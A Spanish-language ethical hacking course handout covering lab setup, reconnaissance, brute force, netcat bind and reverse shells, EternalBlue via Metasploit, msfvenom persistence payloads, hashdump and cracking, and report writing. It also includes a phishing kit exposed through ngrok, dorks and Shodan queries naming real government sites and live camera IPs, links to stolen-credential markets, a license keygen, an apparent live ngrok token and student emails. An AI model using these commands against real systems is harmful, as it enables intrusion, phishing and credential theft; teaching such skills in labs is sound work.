> For the complete documentation index, see [llms.txt](https://academy.cfc-sec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://academy.cfc-sec.com/ceh/pit-ceh-241fab5460ec8020a17dd9f0d1b69727.md).

# PIT CEH 241fab5460ec8020a17dd9f0d1b69727

## PIT CEH

**Docente:** Manuel Flores **mr.leunam**

💡

Este material es **complementario** a las diapositivas presentadas en el curso. Es un documento de actualización continua por lo que se irá añadiendo material y nuevos laboratorios

![image.png](/files/82c42fc3bfc2259693b5f34ad9ac9c6487845cae)

## Información del curso

\| **Nombre del curso** | **cfc |** Ethical Hacking | | --- | --- | | **Descripción** | Este curso busca dotar a los participantes de las capacidades básicas necesarias para empezar en el mundo de la ciberseguridad. Durante el desarrollo de las sesiones, se abordarán temas cruciales como la recopilación de información, la enumeración y el escalamiento de privilegios. | | **Enfoque** | **Seguridad Ofensiva D:** |

## Tema 01: Despliegue del entorno

### Descarga de Máquina

| **Máquina**           | **Enlace**                                                                     |
| --------------------- | ------------------------------------------------------------------------------ |
| **Instalador VMware** | <https://drive.google.com/drive/folders/1lU-73u0gGXR\\_VoL50Q4sM2IMHr\\_gKM9I> |
| **WindowsServer2008** | <https://drive.google.com/drive/folders/1lU-73u0gGXR\\_VoL50Q4sM2IMHr\\_gKM9I> |
| **Kali Linux**        | <https://www.kali.org/get-kali/#kali-virtual-machines>                         |

🎩

**Enlace Alterno (meta2)** <https://www.mediafire.com/folder/x52zhfywgsldm/UNI-6-CEH>

### Despliegue del entorno base

#### Tutorial YouTube

Creando Entorno de pruebas de Hacking Etico usando VWware\
<https://youtu.be/V3nbRZceDhI>

#### Instalación de VMware en Linux

```bash
chmod +x VMware-Player-6.0.3-1895310.x86_64.bundle
sudo ./VMware-Player-6.0.3-1895310.x86_64.bundle
```

#### Teclado Español

#### Creación de Red Interna

#### Añadir interfaz de Red

#### Validar conexiones

```bash
nmap -sP 192.168.20.0/24
```

```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan  --interface eth2 192.168.20.0/24
Interface: eth2, type: EN10MB, MAC: 00:0c:29:30:de:ed, IPv4: 192.168.20.133
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.20.1    00:50:56:c0:00:02       (Unknown)
192.168.20.134  00:0c:29:e2:a5:98       (Unknown)
192.168.20.254  00:50:56:f8:9c:b5       (Unknown)
```

#### \[Adicional] Subneteo para dummys

```
https://www.youtube.com/watch?v=sLWYpqjT0_Y
https://www.youtube.com/watch?v=KsMXVnqQ3sg
```

### Solución de errores comunes

#### Troubleshooting KaliLinux

**Error Autocorreción de HTTPS**

```bash
rm ~/.mozilla/firefox/kali/SiteSecurityServiceState.txt
```

**Desaparece puntero en actualización del upgrade/update**

## USA Ctrl + Alt + T para abrir la terminal.

```bash
sudo mkdir -p /etc/X11/xorg.conf.d
sudo nano /etc/X11/xorg.conf.d/20-modesetting.conf
```

Añadimos esta sección:

Section "Device"\
Identifier "Card0"\
Driver "modesetting"\
Option "SWCursor" "true"\
EndSection

## USA Ctrl + X para guardar el archivo

## sudo reboot para reinciar la maquina

**Desaparece puntero en actualización del upgrade/update \[alternativa]\[Percy Morales]**

Solution If the Mouse Cursor Disappears in Kali Linux on VMware #shorts #kalilinux #vmware\
<https://www.youtube.com/shorts/QUN\\_M5LUtVs?feature=share>

#### Troubleshooting VMware

**Error de Intel VT-x**

<https://youtu.be/6f1Qckg2Zx0?si=NddQ9SAvCqrIjdZP>

## Tema 02: Reconocimiento

### Conceptos Base

Complementario al material del curso

| **Vulnerabilidad** | La forma en como se puede entrar                      | Error en los formularios de Drupal en la versión 7.57    |
| ------------------ | ----------------------------------------------------- | -------------------------------------------------------- |
| **Exploit**        | La manera de aprovechar la vulnerabilidad             | Formulario con datos que permitan ejecutar código remoto |
| **Payload**        | Como aprovechar el exploit para conseguir mi objetivo | Acceso a una Shell para ejecutar cualquier código        |

### Taller de comandos Linux

{% stepper %}
{% step %}

### Comandos de Navegación

| Comando       | Descripción                                             |
| ------------- | ------------------------------------------------------- |
| `pwd`         | Muestra el directorio actual (ruta absoluta).           |
| `ls`          | Lista los archivos y carpetas del directorio actual.    |
| `ls -l`       | Lista detallada (permisos, propietario, tamaño, fecha). |
| `cd [ruta]`   | Cambia al directorio indicado. Ej: `cd /home/usuario`   |
| `cd ..`       | Sube un nivel en el árbol de directorios.               |
| `cd ~`        | Cambia al directorio personal del usuario.              |
| {% endstep %} |                                                         |

{% step %}

### Gestión de Archivos y Directorios

| Comando               | Descripción                         |
| --------------------- | ----------------------------------- |
| `touch archivo.txt`   | Crea un archivo vacío.              |
| `mkdir carpeta`       | Crea un directorio.                 |
| `rm archivo.txt`      | Elimina un archivo.                 |
| `rm -r carpeta`       | Elimina una carpeta y su contenido. |
| `cp archivo destino/` | Copia un archivo a otro directorio. |
| `mv archivo destino/` | Mueve o renombra un archivo.        |
| `nano archivo.txt`    | Editar archivo                      |
| `cat archivo.txt`     | Nos muestra el archivo              |
| `tail archivo.txt`    | Ultimas lineas del archivo          |
| {% endstep %}         |                                     |

{% step %}

### Cancelar procesos

| Comando       | Descripción                                                         |
| ------------- | ------------------------------------------------------------------- |
| `Ctrl + C`    | Detiene (cancela) la ejecución del proceso actual en la terminal.   |
| `Ctrl + Z`    | Suspende el proceso actual y lo envía a segundo plano.              |
| `ps`          | Muestra una lista de los procesos en ejecución.                     |
| `xkill`       | Cierra (mata) una ventana o proceso gráfico al hacer clic sobre él. |
| {% endstep %} |                                                                     |

{% step %}

### Permisos

| Comando                       | Descripción                      |
| ----------------------------- | -------------------------------- |
| `chmod 755 archivo`           | Cambia los permisos del archivo. |
| `chown usuario:grupo archivo` | Cambia el propietario y grupo.   |
| `ls -l`                       | Ver los permisos actuales.       |
| {% endstep %}                 |                                  |

{% step %}

### Información del Sistema

| Comando       | Descripción                                                 |
| ------------- | ----------------------------------------------------------- |
| `uname -a`    | Muestra info del kernel y sistema.                          |
| `top`         | Muestra procesos activos (como el administrador de tareas). |
| `htop`        | Versión avanzada de `top` (requiere instalación).           |
| `df -h`       | Muestra el uso del disco.                                   |
| `free -h`     | Muestra el uso de memoria RAM.                              |
| {% endstep %} |                                                             |

{% step %}

### Gestión de Paquetes

| Comando                    | Descripción                        |
| -------------------------- | ---------------------------------- |
| `sudo apt update`          | Actualiza la lista de paquetes.    |
| `sudo apt upgrade`         | Actualiza los paquetes instalados. |
| `sudo apt install paquete` | Instala un paquete.                |
| `sudo apt remove paquete`  | Elimina un paquete.                |
| {% endstep %}              |                                    |

{% step %}

### Red

| Comando           | Descripción                                                 |
| ----------------- | ----------------------------------------------------------- |
| `ping google.com` | Comprueba la conexión a internet.                           |
| `ip a`            | Muestra la configuración de red.                            |
| `ifconfig`        | Similar a `ip a` (requiere instalación en algunas distros). |
| `curl url`        | Obtiene contenido de una URL.                               |
| {% endstep %}     |                                                             |

{% step %}

### Reiniciar NetworkManager

```bash
sudo systemctl restart NetworkManager
```

{% endstep %}

{% step %}

### Búsqueda

| Comando                        | Descripción                       |
| ------------------------------ | --------------------------------- |
| `find /ruta -name archivo.txt` | Busca un archivo por nombre.      |
| `locate archivo.txt`           |                                   |
| `grep 'texto' archivo.txt`     | Busca texto dentro de un archivo. |
| {% endstep %}                  |                                   |

{% step %}

### Otros útiles

| Comando                  | Descripción                                 |
| ------------------------ | ------------------------------------------- |
| `man comando`            | Muestra el manual del comando. Ej: `man ls` |
| `clear`                  | Limpia la pantalla.                         |
| `history`                | Muestra el historial de comandos.           |
| `alias nombre='comando'` | Crea un alias. Ej: `alias cls='clear'`      |
| `exit`                   | Sale de la terminal o sesión SSH.           |
| {% endstep %}            |                                             |

{% step %}

### Historial Linux

Archivos donde se guardan los comandos:\
`.zsh_history`\
`.bash_history`

Para borrar historial:

```bash
history -c
rm .bash_history
rm .zsh_history
```

{% endstep %}
{% endstepper %}

### Lab 01: Phishing

#### Conceptos Base

Ejemplos de Phishing

#### Hidden eye \[Youtube]

Hidden Eye | Laboratorio de Phishing\
<https://youtu.be/rYfrthT8H4c>

```bash
git clone "https://github.com/Morsmalleo/HiddenEye_Legacy.git"
cd HiddenEye_Legacy
sudo pip3 install -r requirements.txt --break-system-packages
sudo pip3 install pgrep --break-system-packages
sudo pip3 install pyngrok --break-system-packages
python3 ./HiddenEye.py
```

💡

La libreria ***Kill*** no encontrará la versión solicitrada, sin embargo s epuede constinuar sin ella

Flujo de Phishing

```
http://127.0.0.1:8888 
```

Ejecución en red

```bash
sudo apt install ufw
sudo ufw allow 8888 [OPCIONAL]
sudo ufw allow 80 [OPCIONAL]
# sudo ufw allow 5555 [OPCIONAL]

# 192.168.20.133:80 seria igual a 127.0.0.1:8888

sudo apt install socat   # si no lo tienes
sudo socat TCP-LISTEN:80,fork TCP:127.0.0.1:8888

# 192.168.20.133:5555 seria igual a 127.0.0.1:8888
# sudo apt install socat   # si no lo tienes
# sudo socat TCP-LISTEN:5555,fork TCP:127.0.0.1:8888
```

#### Pruebas ngrock

💡

Creamos la cuenta en ngrock:

<https://ngrok.com/>

Descargas: <https://ngrok.com/download/linux>

```bash
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com bookworm main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
```

```bash
ngrok config add-authtoken 1y9L0sj2cDzQiu70fynWOPkZzKS_PKZZgdzbbpHkGRWeiDpa
```

```bash
ngrok http 80
```

<https://b00d11359cd7.ngrok-free.app/>

### Reconocimiento

#### Reconocimiento Pasivo

#### Google Dorks de ejemplo

```
siite:gob.mx intitle:"ftp"
site:gob.mx filetype:pdf administrator password
```

#### Descubrimiento de DNS

Listado de Herramientas online

* <https://dnsdumpster.com/>
* <https://crt.sh/?q=GOB.PE>

💡

<http://cfc-sec.com/>

💡

<http://gob.pe/>

Listado de Herramientas Kali

* sublis3r
* dnsenum

```bash
sublist3r -d leunam.xyz
```

Salida ejemplo:

```
[-] Total Unique Subdomains Found: 3
mr.leunam.xyz
ps.leunam.xyz
talks.leunam.xyz
```

```bash
dnsenum leunam.xyz
```

Salida ejemplo:

```
leunam.xyz.         5        IN    A        104.21.89.65
leunam.xyz.         5        IN    A        172.67.156.228
```

#### Shodan

💡

**Acceso Web:**

<https://www.shodan.io/dashboard>

**Ejemplos de búsqueda:**

<https://www.shodan.io/search/examples>

**Existe en recurso de Dorks**

<https://github.com/dootss/shodan-dorks>

Consultas Base

```
country:pe
country:pe city:"Lima"
os:"Ubuntu"
os:"Windows Server 2008"
port:3389
product:"Remote Desktop Protocol"
country:pe http.title:"Index of /"
country:pe city:"Lima" os:"Ubuntu" port:8080
country:pe city:"Lima" os:"Ubuntu" org:"Universidad Nacional"
country:pe city:"Lima" org:"Universidad Nacional" port:3389
```

<https://www.shodan.io/host/161.132.238.18>

Equipos con ransomware

```
"attention" "encrypted" port:3389
```

Revisión de cámaras

```
country:pe screenshot.label:webcam has_screenshot:1
http://190.117.213.156:8080/
```

```
country:pe title:"+tm01+"
http://179.43.87.242:1024/img/main.cgi?next_file=main.htm
```

#### ZoomEye

💡

**Acceso Web:**

<https://www.zoomeye.ai/>

**Busqueda IA:**

<https://www.zoomeye.ai/gpt>

Consultas Base

```
country="PE"
org="Stanford University"
os="RouterOS"
country="BR" vul.cve="CVE-2025-20343"
vul.cve="CVE-2023-46747"

app="CVE-2025-20343" && country="Brazil"
```

#### Búsqueda de credenciales

💡

**Dehashed**

<https://dehashed.com/>

**IntelX**

<https://intelx.io/>

**Russian Market**

<https://rm1.to/login>

<http://rumarkstror5mvgzzodqizofkji3fna7lndfyl> mzeisj5tamqnwnr4ad.onion/login?onion=1

🎩

**Infostealers - Del robo de credenciales a su distribución**

<https://talks.leunam.xyz/presentaciones/2025-jinis-ucsm>

JINIS\_2025.pdf

<https://www.youtube.com/watch?v=2MCCYNpYNxo>

## Tema 03: Escaneos

### Enumeración \[nmap]

```
VER CUANTOS EQUIPOS ESTÁN ACTIVOS (HOST DISCOVERY)
    nmap -PR (ARP)
    nmap -PE (ICMP / ping)
    nmap -Pn (Sin Ping / evita bloqueos de firewall)
    nmap -sn (Ping sweep)

VER PUERTOS ACTIVOS
    nmap -p 80,123 

VER VERSIONES
    nmap -sV  
    nmap -O 
    nmap --script banner

VER VULNERABILIDADES (Nmap Scripting Engine (NSE))
    nmap -sC
    nmap --script default,discovery,vuln

TIEMPO DE ACCIÓN
    nmap -T3 (por defecto)
    nmap -T0 (mas lenta)
    nmap -T5 (mas rápido)
    nmap --vv
    
nmap -p 22,80 -sV -T5 --script default,discovery,vuln  -O 192.168.20.128
nmap -p 22,80 -sV -T5 --script vuln  -O 192.168.20.128
nmap -p 22,80 -sV -T0 192.168.20.128
```

Salida ejemplo:

```
nmap -sV 192.168.20.128
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-13 21:34 EDT
Nmap scan report for 192.168.20.128
Host is up (0.00020s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         ProFTPD 1.3.5
22/tcp   open   ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http        Apache httpd 2.4.7
445/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp  open   ipp         CUPS 1.7
3000/tcp closed ppp
3306/tcp open   mysql       MySQL (unauthorized)
8181/tcp open   http        WEBrick httpd 1.3.1 (Ruby 2.3.7 (2018-03-28))
MAC Address: 00:0C:29:F6:B7:17 (VMware)
Service Info: Hosts: 127.0.0.1, UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.45 seconds
```

🎩

Scripts especificos

`nmap -p445 --script smb-vuln-ms17-010 <target>`

### Análisis de Vulnerabilidades

🎩

**CVE - Common Vulnerability and Exposure - Identificador de la Vulnerabilidad**\
<https://cve.mitre.org/>

🎩

**CVSS - Common Vulnerability Score System - Puntaje de Criticidad - Cualitativo**\
<https://www.first.org/cvss/calculator/3.1>

💡

**Nombre Común:** RediShell

**Id: CVE-2025-49844**

**Puntaje:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

#### Nessus para Análisis de Vulnerabilidades

Escaneos Automatizados con Nessus\
<https://youtu.be/ODaSQWaRONw?si=aRl1ow9OFHc\\_lJxN>

Registro: <https://es-la.tenable.com/products/nessus/nessus-professional/evaluate>

```bash
Descarga: https://www.tenable.com/downloads/nessus
sudo dpkg -i Nessus-10.10.1-ubuntu1604_amd64.deb 
systemctl start nessusd.service
https://127.0.0.1:8834/
```

Obtener trial 07 sin registro:

```bash
git clone https://github.com/harshdhamaniya/nessuskeygen
cd nessuskeygen
python nessuslicense.py2 [elegimos Expert Key]
```

Van a tener que ingresar la Key **\[faltante]**

Escaneos

🎩

Actualizar por otros 7 días más

Reporte Final

#### OpenVas para Análisis de Vulnerabilidades

Escaneos Automatizados con OPENVAS Community\
<https://youtu.be/pqFGUGzeZyE?si=1rRraHI7Bn6742eQ>

```bash
# Instalar Docker
sudo apt update
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo apt install docker-compose
sudo usermod -aG docker $USER && su $USER
```

```bash
# Instalar Openvas
export D_DIR=$HOME/greenbone-community-container && mkdir -p $D_DIR
curl -f -O -L https://greenbone.github.io/docs/latest/_static/docker-compose.yml --output-dir "$D_DIR"

# Reemplazar en el .yml el 127.0.0.1 por 0.0.0.0
docker compose -f $D_DIR/docker-compose.yml pull
docker compose -f $D_DIR/docker-compose.yml up -d
```

```
http://127.0.0.1:9392/login
Usuario: admin
Password: admin
```

#### Solución de problemas

Feeds no cargan (En caso demore mas de 1 días)

```bash
ospd-openvas
docker compose -f docker-compose.yml restart ospd-openvas
```

## Tema 04: Explotación

### Password Guessing

### Diccionarios

Diccionario: Para descargar el SecList

```bash
sudo apt install seclists
```

Diccionario: Descomprimir el RockYou.txt

```bash
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```

Lab: Crackear Contraseña de Zip

🎩

Descromprimir .zip

`zip2john Diccionario.zip > zip_hash.txt`\
`john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt`

Diccionario.zip

mimirocks

Diccionario para fuerza bruta (ejemplos)

```
admin_user
test_user
user_demo
guest_user
vagrant
user_access
admin123
user
msfadmin
user_admin
new_user
user_guest
app_user
admin_user
administrador
```

### Fuerza bruta vía SSH

```bash
hydra -l admin -P passwords.txt ssh://192.168.20.128

# -l un usuario
# -L muchos usuarios
# -p una contraseña
# -P muchas contraseñas
```

```bash
hydra -L passwords.txt -P passwords.txt ssh://192.168.20.128
```

Salida ejemplo de conexión:

```
ssh vagrant@192.168.20.128
vagrant@192.168.20.128's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
```

### Fuerza bruta vía FTP

```bash
hydra -L passwords.txt -P passwords.txt ftp://192.168.20.128
```

Conexión FTP manual:

```
ftp 192.168.20.128
-->username
-->password
```

### Fuerza bruta vía RDP

```bash
hydra -L passwords.txt -P passwords.txt rdp://192.168.20.128:3389
```

Validación RDP usando remmina

```bash
sudo apt update
sudo apt install remmina
```

### Explotación de Vulnerabilidades

### Compartir archivos

Descargamos netcat 1.11\
<https://eternallybored.org/misc/netcat/>

```bash
python3 -m http.server 5555
```

### Conexiones entre atacante y víctima

🎩

¿Como es que la victima ejecuta comandos?

* El atacante sabe las credenciales de la victima y ejecuta comandos desde la maquina victima. (credenciales filtradas/phishing/credenciales defecto)
* Vía ingeniería social hacemos que la victima ejecute comandos: PDF malicioso, Word con Macros, un ejecutable con virus.
* Vía una vulnerabilidad de Ejecución de Codigo Remoto / Buffer Overflow la computadora/servidor de la victima ejecute comandos enviados por el atacante sin intervención del usuario victima

#### Shell Normal

Paso 01: Como víctima dejo mi puerto abierto.\
Paso 02: Como atacante me conecto a la victima a través de su puerto abierto.

```
# Ejecutar en Windows - Paso 01: Abrir puerto
nc.exe -l -p 4444 -e cmd.exe
```

```bash
# Ejecutar en Kali - Paso 02: Conectarse al puerto abierto
nc <IP_Windows> 4444
nc 192.168.20.128 4444
```

Prueba de conexión

#### Shell Reversa

Paso 01: Como atacante dejo abierto un puerto.\
Paso 02: Como víctima me conecto al atacante a través de su puerto abierto.

```bash
# Ejecutar en Kali - Paso 01: Abrir puerto
nc -lvp 4444
```

```
# Ejecutar en Kali - Paso 02: Conectarse al atacante ofreciendo su shell
nc.exe <IP_KALI> 4444 -e cmd.exe
nc.exe 192.168.20.133 4444 -e cmd.exe
```

Prueba de conexión

💡

Hasta el momento hicimos el camino del **Password Guessing / Diccionario → Acceso al servidor → Persistencia**

Sin embargo otro método es buscar vulnerabilidades → explotar vulnerabilidad → **obtener RCE (ejecución de código remoto)**

### Vulnerabilidad: Eternalblue

💡

**Nombre Común: EternalBlue**

**Id: CVE-2017-0144**

**Puntaje:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Comandos Metasploit:

```
msfconsole
```

```
search eternalblue
```

```
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp [opcional]
```

```
show options
```

```
set RHOSTS <target_IP>
set LHOST <your_IP>
set LPORT <your_port> | Usualmente 4444
# Ejemplo:
set RHOST 192.168.20.128
set LHOST 192.168.20.133
set LPORT 8899
```

```
check      # para verificar si es vulnerable
run        # para ejecutar
exit       # para salir
```

Probar comandos meterpreter:

```
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ipconfig
meterpreter > getpid
meterpreter > ps
meterpreter > migrate <pid>
meterpreter > shell
```

Ejemplo de salida sysinfo/getuid en el material.

## Tema 05: Post Explotación

### Persistencia - msfvenom

Generación del archivo ejecutable Windows:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_DEL_ATACANTE> LPORT=<PUERTO> -f exe > reverse_shell.exe

# Ejemplo:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.133 LPORT=4444 -f exe > reverse_shell.exe
```

Generación del archivo ejecutable Linux:

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_DEL_ATACANTE> LPORT=<PUERTO> -f elf > reverse_shell.elf
```

Levantar nuestro listener:

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.20.133
set LPORT 4444
exploit
```

Subir el archivo desde la shell meterpreter - EternalBlue:

```
# Ctr+Z [Para salir de la shell a Background *Meterpreter* ]

meterpreter> mkdir C:\\Users\\vagrant\\Documents\\Tmp
meterpreter> cd C:\Users\vagrant\Documents\Tmp

meterpreter> upload /home/leunam/Documents/00_CEH/reverse_shell.exe C:\\Users\\vagrant\\Documents\\Tmp\\reverse_shell.exe
meterpreter> execute -f C:\\Users\\vagrant\\Documents\\Tmp\\reverse_shell.exe
```

### Obteniendo contraseñas

Solo como administradores:

```
meterpreter> run post/windows/gather/hashdump
```

Salida ejemplo: hashes de usuarios (como en el material).

Password cracking:

```
# Ejemplo de interpretación de hash dump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
# usuario → Administrator
# RID → 500
# LM Hash → aad3b435b51404eeaad3b435b51404ee
# NTLM Hash → e02bc503339d51f71d913c245d35b50b
```

🎩

Tabla de cifrados \[Hashcat]\
<https://gist.github.com/CalfCrusher/6b87a738d0fe7b88e04f4a36eb6d722d>

```
man hashcat | grep "NTLM"
1000 = NTLM
5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 = NetNTLMv2
```

🎩

Descromprimir RockYou.txt

`sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`

Crackear Hashes:

```bash
hashcat -m 1000 --force -a 0 ntlm_hash.txt /usr/share/wordlists/rockyou.txt
```

Ejemplo de resultados (tal como aparece en el material):

```
e02bc503339d51f71d913c245d35b50b:vagrant
0fd2eb40c4aa690171ba066c037397ee:pr0t0c0l
```

## Tema 06: Informe de Vulnerabilidades + IA

### Informe Ejecutivo de Vulnerabilidades

El informe ejecutivo está dirigido a directivos, gerentes o tomadores de decisiones. Su objetivo es explicar el riesgo de forma clara y estratégica, sin entrar en detalles técnicos complejos.

Características principales:

* Lenguaje no técnico y fácil de entender.
* Enfoque en impacto al negocio: financiero, reputacional, legal u operativo.
* Incluye un resumen de los hallazgos más críticos, su nivel de riesgo y qué consecuencias reales puede tener si no se atienden.
* Presenta recomendaciones de alto nivel para mitigar los riesgos.
* Puede incorporar métricas generales, como número de vulnerabilidades por criticidad.

Objetivo:

Ayudar a la dirección a priorizar decisiones y recursos, entendiendo claramente por qué ciertas vulnerabilidades requieren atención inmediata.

### Informe Técnico de Vulnerabilidades

Dirigido a equipos de TI, desarrollo y ciberseguridad. Su objetivo es explicar en detalle cómo funcionan las vulnerabilidades, cómo fueron encontradas y cómo corregirlas.

Características principales:

* Lenguaje técnico y detallado.
* Incluye evidencia: capturas, logs, payloads (sin contenido peligroso), referencias, CVSS, CWE.
* Descripción paso a paso de:
  * Cómo se identificó la vulnerabilidad
  * Cómo se explotaría
  * Qué sistemas específicos afecta
* Indicaciones concretas de cómo resolver o mitigar el problema.
* Puede contener pruebas de concepto, rutas afectadas, configuraciones erróneas, etc.

Objetivo:

Permitir a los equipos técnicos entender, reproducir y corregir cada vulnerabilidad de manera precisa.

### Entregable Modelo

Informe\_Final\_mods.docx

Referencia: <https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H>

#### Consultas en IA (ejemplos)

```
Eres un pentester enfocado en web y debes brindarme el riesgo, descripcion y recomendaciones para un XSS que solo se puede realizar en el panel de administración, brindame tambien el vector de cvss 3.1
```

```
Eres un pentester y debes brindarme el riesgo, descripción, recomendaciones y vector de cvss 3.1 para el eternal blue que está afectando a un Windows Server 2008
```

#### Herramientas Recomendadas

* Flameshot: <https://flameshot.org/>
* labs.sysre.pt: <https://labs.sysre.pt/login/>

## Tema 07: Evaluación Final

### Descripción de la evaluación

El examen constará de 10 preguntas: 5 teóricas y 5 prácticas.\
Las preguntas prácticas estarán basadas en la máquina virtual Metasploitable3.\
La duración total del examen será de 30 minutos.

#### Encuesta cualitativa del Docente

Formulario CEH PIT: <https://forms.gle/M2cs1kxyKdV5v2fj9>

#### Material recomendado para la evaluación y posterior al curso

* Creando Entorno de pruebas de Hacking Etico usando VWware — <https://youtu.be/V3nbRZceDhI>
* Hidden Eye | Laboratorio de Phishing — <https://youtu.be/rYfrthT8H4c>
* Escaneos Automatizados con Nessus — <https://youtu.be/ODaSQWaRONw>
* Escaneos Automatizados con OPENVAS Community — <https://youtu.be/pqFGUGzeZyE>
* Taller de Auditoria de Contraseñas. — <https://youtu.be/eEtFu0pFIJY?si=mXILnljcIqfI4Nuc>
* Pentesting con ChatGPT: Resolviendo "Keeper" Hack The Box Paso a Paso — <https://youtu.be/QosgoqJSUSw?si=JojI\\_ps7DwGY-9JT>
* Kerberos internals: Mas alla del roasting — <https://www.youtube.com/live/Rh0HyKP\\_\\_iE?si=eE31uJNa578c3\\_Lh>
* CFC Workshop #1 | OSINT: Explorando la Inteligencia en Fuentes Abiertas — <https://www.youtube.com/live/lsZ1bE57WsQ?si=pFTFcoVxC\\_m\\_0dfr>
* CFC Workshop #2 | Principios de brujería en Powershell — <https://www.youtube.com/live/m\\_FuM3UkXj0?si=QehM4wOnXKU-Bp93>

### Invitación a la comunidad

**Correo de contacto:** <mlost6013@gmail.com>

<https://linktr.ee/cfc\\_security>

<https://www.youtube.com/@mr.leunam>

¡Únete al servidor de Discord CFC Security!: <https://discord.gg/2kdsRjZA3Y>

CFC | General: <https://chat.whatsapp.com/HhiuHMkXsfQ1LlsWewH0PJ>

#### Informes Curso CRTS

Clase Demo: <https://www.youtube.com/live/Wia5LaxWVug?si=d6zlEbFobUb11zIN>

CRTS - cfc Red Team Specialist: <https://forms.gle/mhWPvyKac7nPBLvM6>

Cursos Udemy

* Ethical Hacking CEHPC \[CFC-Security]\
  <https://www.udemy.com/course/ethical-hacking-cehpc-cfc-security/?referralCode=A8B23154016EFCB28157>
* Taller de Preparación eJPT 2.0 \[CFC-Security]\
  <https://www.udemy.com/course/taller-de-preparacion-ejpt-20-cfc-security/?referralCode=FB295C07C870657D3F1B>

#### Cursos TiendUP - 50%

<https://cfc-security.tiendup.com/>

🎩

Descuento cualquier item \[50%]

`*CFCPIT50*`

## Hall de la Fama Comentarios

### PIT 06

Ganador: <luismi.acuario@gmail.com>

Premio: <https://www.udemy.com/course/taller-de-preparacion-ejpt-20-cfc-security/?srsltid=AfmBOopFBOzwKy6J5aISOtOrobuRxjUzuWQztilThu28pFpT0CYm\\_nsa\\&couponCode=MT180825G1>

### PIT 07

Carlos: <dcarlox1212@gmail.com>

<https://cfc-security.tiendup.com/>

### PIT 08

Sebastian D: <poluxdelacruz@gmail.com>

Aldair: <aldairchero20@gmail.com>

Ashley: <ashleygalarza2015@gmail.com>
